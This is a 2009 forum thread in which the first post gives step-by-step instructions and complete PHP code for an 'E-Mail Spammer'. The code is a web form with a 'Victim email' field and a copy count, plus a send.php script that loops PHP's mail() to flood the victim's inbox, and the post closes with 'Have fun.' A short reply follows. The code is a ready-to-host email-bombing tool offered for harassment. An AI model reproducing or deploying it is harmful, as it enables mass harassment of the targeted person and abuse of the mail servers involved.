Post Reply 
 
Thread Rating:
  • 0 Votes - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Email Spammer.
03-28-2009, 01:40 AM (This post was last modified: 03-28-2009 01:43 AM by .Mantas.)
Post: #1
Email Spammer.
1. Open notepad, and write this:
Code:
<title> E-Mail Spammer</title>
<?php
// Hs
echo '<font color=red><b><h2>E-Mail Spammer</h2></b></font>';
?>
<form action="send.php" method="post">
<fieldset><legend>/:</legend>
<p><b>Victim email:</b> <input type="text" name="email" size="40"
maxlength="80"/></p>
<p><b>From:</b> <input type="text" name="from" size = "50" maxlength = "30"/></p>
<p><b>Title:</b> <input type="text" name="subject" size="50" maxlength="100"/></p>
<p><b>Message:<b></p><p><TEXTAREA NAME="message" ROWS=6 COLS=40>
</TEXTAREA></p>
<p><b>How many copys to send: </b> <input type="text"  name="sendnum" size="30" maxlength="8"/></p>
</fieldset>
<div align="center" <input type="submit" name="submit" value="SPAM!" /></div>
</form>
</body>
2. Save this as bomber.php
3. Open notepad again and write:
Code:
<?php

$email = $_REQUEST['email'];
$subject = $_REQUEST['subject'];
$message = $_REQUEST['message'];
$from = $_REQUEST['from'];
$sendnum = $_REQUEST['sendnum'];

$i = 0;
while($i <= $sendnum) {
mail($email, $subject, $message, "From: You@lama.org <You@lama.org>");
echo "<center><br>$i mails sent!<br><br></center>";
$i++;
}

?>
4. Save this as send.php
5. Add those files to your host.
6. Go to 'http://www.your-page.com/bomber.php'
7. Have fun. Big Grin
Find all posts by this user
Quote this message in a reply
03-28-2009, 02:04 PM
Post: #2
RE: Email Spammer.
Nice, not that any web masters need or want this lol.
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump: